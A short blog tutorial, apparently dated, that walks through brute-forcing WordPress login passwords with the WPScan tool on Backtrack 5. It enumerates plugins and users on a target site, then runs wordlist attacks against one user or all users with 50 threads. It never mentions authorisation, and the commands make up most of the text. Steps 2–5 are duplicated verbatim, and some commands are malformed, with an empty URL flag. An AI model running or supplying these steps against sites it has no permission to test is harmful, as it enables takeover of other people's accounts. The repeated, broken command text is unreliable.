Today i want to share with you a very simple tutorial on how to Brute Force passwords on a wordpress system.
The tool we will be using today is Wpscan> , i am using Backtrack 5 KDE 32bit for this tutorial.
You may download the PDF version of this tutorial Click me
Introduction ?
WPScan is a black box WordPress Security Scanner written in Ruby. The
primary function of Wpscan is to find known security weaknesses within
WordPress installations.
Lets Begin :
1) On a terminal type: cd /pentest/web/wpscan/
2) Type in :./wpscan.rb –url example.wordpress.com –enumerate p
………when prompted, “Do you want follow the redirection ? [y/n] ” choose Y.
3) Thirdly, type in :./wpscan.rb –url example.wordpress.com –enumerate u.
4) Lastly, lets start Brute Forcing :
To Brute Force a Single Username :
./wpscan.rb –url –wordlist <enter your wordlist> –username <Enter Username You want to Brute>
To Brute Force on Enumerated Users using 50 threads :
./wpscan.rb –url –wordlist enter your wordlist –threads 50
5) As you can see above, it is brute forcing the user i entered with 57046 passwords. This will take
quite sometime so if your wordlist is bigger then 1gb. I would advise you to split them up
2) Type in :./wpscan.rb –url example.wordpress.com –enumerate p
………when prompted, “Do you want follow the redirection ? [y/n] ” choose Y.
3) Thirdly, type in :./wpscan.rb –url example.wordpress.com –enumerate u.
4) Lastly, lets start Brute Forcing :
To Brute Force a Single Username :
./wpscan.rb –url –wordlist <enter your wordlist> –username <Enter Username You want to Brute>
To Brute Force on Enumerated Users using 50 threads :
./wpscan.rb –url –wordlist enter your wordlist –threads 50
5) As you can see above, it is brute forcing the user i entered with 57046 passwords. This will take
quite sometime so if your wordlist is bigger then 1gb. I would advise you to split them up
No comments:
Post a Comment